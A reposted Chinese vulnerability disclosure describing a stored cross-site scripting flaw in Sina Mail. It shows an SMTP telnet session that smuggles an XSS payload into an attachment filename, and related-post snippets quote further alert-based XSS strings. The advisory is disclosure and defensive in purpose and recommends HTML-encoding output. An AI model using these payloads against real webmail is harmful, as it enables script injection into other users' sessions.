新浪邮箱存在存储类型跨站脚本漏洞

最新推荐文章于 2024-06-12 21:22:26 发布
最新推荐文章于 2024-06-12 21:22:26 发布
阅读量223 收藏
点赞数
文章标签: web安全 网络安全 hack 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124172395
版权

漏洞详情

披露状态:

2010-07-23: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-23: 细节向公众公开

简要描述:

新浪邮件某功能未正确过滤提交的数据导致跨站脚本攻击

详细说明:

通过SMTP发送DATA字段
</code>
------_=_NextPart_001_01CAC74B.52CBABC0
Content-Type: application/octet-stream;
name="findshell.exe;<img src=1 οnerrοr=alert(3)>"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="findshell.exe;<img src=1 οnerrοr=alert(3)>"
</code>
到服务器, 可导致在WEB页面正文输出的时候产生跨站脚本漏洞.

漏洞证明:

telnet smtp.sina.com.cn
helo world
250 irxd5-187.sinamail.sina.com.cn
auth login
334 VXNlcm5hbWU6
NTFuNA==
334 UGFzc3dvcmQ6
YXNkZmFzZGY=
235 #2.0.0 OK Authenticated
mail from:<51n4@sina.com>
250 sender <51n4@sina.com> ok
rcpt to:<51n4@sina.com>
250 recipient <51n4@sina.com> ok
data
354 go ahead
Return-Path: <51n4@sina.com>
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----_=_NextPart_001_01CAC74B.52CBABC0"
Subject: welcome to use Microsoft Live Messenger
Date: Fri, 19 Mar 2010 18:02:45 +0800
Message-ID: <9C8377EC429C3B4FA12C4CA87E18922601137EB6@exchange.microsoft.com>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator:
From: "AD" <51n4@sina.com>
To: <51n4@sina.com>
This is a multi-part message in MIME format.
....................................
------_=_NextPart_001_01CAC74B.52CBABC0
Content-Type: application/octet-stream;
name="findshell.exe;<img src=1 οnerrοr=alert(3)>"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="findshell.exe;<img src=1 οnerrοr=alert(3)>"
...................................
.
250 ok: Message 154992874 accepted

修复方案:

在输出内容的时候做HTML编码过滤.

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
腾讯再爆跨站漏洞(QQ邮箱自助服务)
07-13
qqkuazhan20070713.rar 利用前后源码页面
对国内主流邮箱跨站测试
weixin_30788239的博客
06-09 224
一、起因其实小雕以前发现过QQ邮箱跨站问题,不过那个是只能跨群邮件,跨不了普通个人邮件的。于是小雕继续研究,终于有了突破性进展!这一次跨得貌似厉害了点,嘿嘿。126、21cn、sina、tom、sohu、163、QQ这些大学常用的邮箱存在跨站问题!经测试已经全部成功了,嘿嘿。不过 yahoo、hotmail这几个没有跨出来,鉴于技术和时间都有限,就说说已发现并测试成功的这些吧。貌似也是具有"中...
邮箱帐号密码被盗用怎么办?
weixin_34319111的博客
08-31 307
最近各大电子邮箱用户的账户密码被盗用的情况频有繁发生,后果非常严重,用户,企业该怎么办?现将一般的特征表现和U-Mail邮件服务器软件的紧急处理方法简要归纳,做个参考,请大家即时做好防御。 如何判定: 1、某个人收到大量退信,但是他却反应没有发送过这些邮件。 2、正常邮件延时很大,发现远程队列堵塞了大量的邮件。 3、队列中出现大量邮件,收发件人均不是本地用户。 4...
新浪微博多处XSS漏洞
swordheart的博客
04-11 207
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 2010-08-18: 细节向公众公开 简要描述: 新浪微博多处粉严重的XSS,尽快修复吧 详细说明: 同城活动那里是有xss的,名称还是简介那里忘记了";alert(1);//你们再测下吧,今天不让发活动了- -次数限制太严格了…… 漏洞证明: http://t.sina.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253
dovecot editheader 扩展增加自己的邮件头
weixin_34297300的博客
12-16 486
为什么80%的码农都做不了架构师?>>> ...
跨站脚本执行漏洞详解与防护
01-20
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
web存储跨站脚本漏洞验证特殊字符和语句
01-08
这是存储跨站脚本验证的一些特殊语句,可以用来查看内网、系统、app、web是否存在XSS漏洞
jQuery Mobile漏洞会有跨站脚本攻击风险
12-11
根据国外媒体的最新报道,谷歌公司的安全工程师Eduardo Vela在jQuery Mobile框架中发现了一个安全漏洞,这个漏洞将会让 所有使用了jQuery Mobile的网站暴露于跨站脚本攻击风险之下 。 jQuery Mobile项目(jQuery框架...
论文研究-基于分布式跨站脚本漏洞检测技术的研究 .pdf
08-16
基于分布式跨站脚本漏洞检测技术的研究,杨君,马兆丰,在Web应用程序的众多攻击中, XSS攻击是最常见的安全隐患之一。本文针对跨站脚本漏洞检测准确率和效率低下的问题,提出了一种分布��
Dedecms存在储存型跨站脚本漏洞1
08-03
测试环境:DedeCMS-V5.7-UTF8-SP2 发布日期: 2017-03-15 官方最新版 漏洞利用条件:DedeCMS开启shop模块漏洞分析漏洞触发
telnet 收发邮件及邮件内容的简单解读
c337134154的专栏
04-09 3999
这两天学习了用telnet手工连接服务器,接受发送邮件,并尝试了一点简单的解读 首先是用telnet发送邮件 1、使用 Telnet 程序连接到 163 的邮件服务器的 25 端口(该端口是默认的) telnet smtp.163.com 25 会返回一些信息,最后会给出所有的截图 2.ehlo acm(内容随意) ehlo主机名 SMTP 邮件发送程序与SM
telnet实现简单的邮件发送
ims的博客
05-30 4109
下面的命令为单条输入执行%创建连接% telnet smtp.126.com 25 %登录服务器% EHLO 126.com auth login base编码的邮箱名 base编码的邮箱密码 %添加地址% mail from:&lt;sender@126.com&gt; rcpt to:&lt;receiver@126.com&gt; %添加邮件数据% data From: Bob ...
Roundcube Webmail跨站脚本漏洞(CVE-2015-5381 )
weixin_30242907的博客
04-10 704
Preface Software: https://roundcube.net/Versions:1.1.x<1.1.2CVE:CVE-2015-5381Author:sroesemannRelease date: 2015-5-30 Reference Roundcube Webmail跨站脚本漏洞(CNVD-2017-08082) XSS via _mbox-paramet...
图解Telnet命令和命令行看邮件
bcbobo21cn的专栏
05-05 7132
1 打开telnet 2 开启本地回显 3 telnet 百度、新浪 连不上,下次再搞; 4 telnet 本地 搞不定,下次再搞; 5 看新浪邮件 连接到pop3邮件服务器了; 照下图输入用户名和密码; 因为我的新浪邮箱长期不用已被冻结,故打不开; 6 看搜狐邮件
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 367
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 695
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
车载网络安全指南 概述(一)
最新发布
qq_42357877的博客
06-12 241
汽车电子系统网络安全指南给出汽车电子系统网络安全活动框架,以及在此框架下的汽车电子系统网络安全活动、组织管理和支持保障等方面的建议。汽车电子系统网络安全指南适用于指导整车厂、零部件供应商、软件供应商、芯片供应商以及各种服务提供商等汽车电子供应链上各组织机构开展网络安全活动,指导相关人员在从事汽车电子系统的设计开发、生产、运行和服务等过程中满足基本的网络安全需求。
jquery跨站脚本漏洞
09-02
然而,由于其普遍性,jQuery也存在一些安全漏洞,其中之一是跨站脚本攻击(XSS)。 跨站脚本攻击是指攻击者利用网页中的漏洞来注入恶意脚本代码,从而窃取用户敏感信息或者对用户进行各种不良操作。而jQuery的跨站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值